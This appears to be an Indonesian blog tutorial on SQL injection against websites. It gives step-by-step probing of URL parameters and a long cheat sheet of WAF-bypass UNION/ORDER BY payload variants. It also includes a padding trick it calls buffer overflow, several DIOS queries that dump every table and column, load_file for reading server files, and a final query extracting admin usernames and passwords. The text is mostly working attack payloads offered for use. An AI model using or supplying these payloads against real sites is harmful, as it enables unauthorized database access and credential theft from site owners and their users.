Tutorial atau Cara Hack Dengan Tehnik SQL Injection

Newest Post

Tutorial atau Cara Hack Dengan Tehnik SQL Injection - Buffer Overflow + WAF Bypass

// Posted by :Unknown // On :Sabtu, 28 Januari 2017

Gmorn guys...
kali ini saya mo ngasih tau beberapa trik buat SQL Injection - Buffer Overflow + WAF Bypass.

biasa, kita cari target dulu.
cth
http://localhost.crots/anu.php?iku=6
kita cba dlu pake ' , klo masih bisa di akses, kit lajut, tp kadang ada jg yg forbidden,
cth:
http://localhost.crots/anu.php?iku=6' (403)
coba sobat pake tanda \
cth:
http://localhost.crots/anu.php?iku=6\ (sukses, udah gk forbidden)

next kita lanjut dg order
cth:
http://localhost.crots/anu.php?iku=6+order+by+100--
atau
http://localhost.crots/anu.php?iku=-6+order+by+100--
atau
http://localhost.crots/anu.php?iku=-6+order+by+100--
atau
http://localhost.crots/anu.php?iku=6'+order+by+100--+
atau
http://localhost.crots/anu.php?iku=-6'+order+by+100--+-
atau
http://localhost.crots/anu.php?iku=.6+order+by+100--

cari column nya ada berapa, jika klo ada halangan yg harus kita bypass waff, coba beberapa bypass waf yg ini guys:

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER+BY*/

/*!50000ORDER+BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/
order%0a%0aby
Group+by

ok kita lanjut, dg cari coloumn nya ada berapa,

sekarang kita pake union bro.
cth:
http://localhost.crots/anu.php?iku=6+union+select+1,2,3--

cari angka ajaibnya nya ada di angka berapa, jika klo ada halangan yg harus kita bypass waff, coba beberapa bypass waf yg ini guys:

/*!50000union*//**//*!50000select*/

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

/*!50000union*//**_**//*!50000select*//**_**/

%55nion(%53elect+1,2,3)--+-

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION+SELECT*//**/

/**//*!50000UNION+SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON+SeLeCt*/

union+/*!50000%53elect*/

+#uNiOn+#sEleCt

+#1q%0AuNiOn+all#qa%0A#%0AsEleCt

/*!%55NiOn*/+/*!%53eLEct*/

/*!u%6eion*/+/*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union+(/*!/**/+SeleCT+*/+1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/+/*!SelECt*/

+union+distinct+select+

+union+distinctROW+select+

uNiOn+aLl+sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni<on+all=""+sel="">/*!20000%0d%0aunion*/+/*!

20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a+/SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%+2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

++#1q%0Aunion+all#qa%0A#%0Aselect

union(select+(1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union+(select+1111,2222,3333)

uNioN+(/*!/**/+SeleCT+*/+11)

union+(select+1111,2222,3333)

++#1q%0AuNiOn+all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/

%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%

53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs+ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%+2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe+cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

/union\sselect/g

/union\s+select/i

/*!UnIoN*/SeLeCT

+UnIoN/*&a=*/SeLeCT/*&a=*/

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+’UnI”On’+'SeL”ECT’

+uni+on+sel+ect+

+/*!UnIoN*/+/*!SeLeCt*/+

/*!u%6eion*/+/*!se%6cect*/

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/+/^.*select.*$/

/*union*/union/*select*/select+

/*uni+X+on*/union/*sel+X+ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/

un?<ion+sel="">+un/**/ion+se/**/lect+

+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a+/select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

/*!UnIoN*/SeLecT+

tp terkadang ada juga yg di depan order kita mesti bypass pake
and+false
and+1=1and+0
having+0
limit+2,1
div+0
is +null
^+100000000
dan masih banyak

cth:
http://localhost.crots/anu.php?iku=6+and+false+union+select+1,2,3--

klo udah sukses nanti gk error lg (buat test, coloumn nya ada 3), tp keluar angka ajaibnya, tp jika malah koneksi reset, kita perlu pake tehnik buffer overflow, caranya kek gini:
http://localhost.crots/anu.php?iku=.6e0union%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0select+1,2,3--
nb: %23A itu buffer overflow nya, jadi kita banyakin text A nya sampe sitenya gk error lagi.

ok kita lanjut, dg print db dan apa yg mo lu print,

klo lu mau print nama lu, lu bisa masukin text lu kek gini: 1,'inject by anu<br>',3--
atau lu juga bisa convert text html lu make hex ato binary, untuk hex tambahkan 0x di depan hex mu, sedangkan utk binary tambahkan 0b di depan binary mu.

ini beberapa cheat sheet buat SQLi:
database() : utk print nama database
user() : utk print user
version() : utk print versi Databasenya
@@hostname : utk print nama host/servernya
dan masih banyak sebenernya..

dan jika lu mau print file (kek LFD gitu) lu bisa pake: load_file(/file.php)

jika lu males anu satu2 lu bisa pake DIOS (Dump In One Shoot), ini beberapa DIOS yg bisa lu pake:

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_ name))))x)

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

(select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)where+(table_schema!='information_schema')+and(0x00)in(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat(0x3c62723e,@tbl_sc:=table_schema,'+::',@tbl:=table_name,'+(Rows+',(select+table_rows+from+information_schema.tables+where+table_schema=@tbl_sc+and+table_name=@tbl),')',column_name),+(column_name))))))a)

dan masih banyak sebenernya...

kemudian kita tinggal liat isi dalemanya, kek lihat user admin pada table admin, caranya kek gini guys:

1,concat(user,0x3a,password),3+from+admin--

nb : yg warna qua itu isi dari tablenya, sedangkan yg warna pink itu hex buat : , pemisah antara text user dan password

source: http://pastebin.com/XBGczDdT & https://www.youtube.com/watch?v=xeB622q8a3E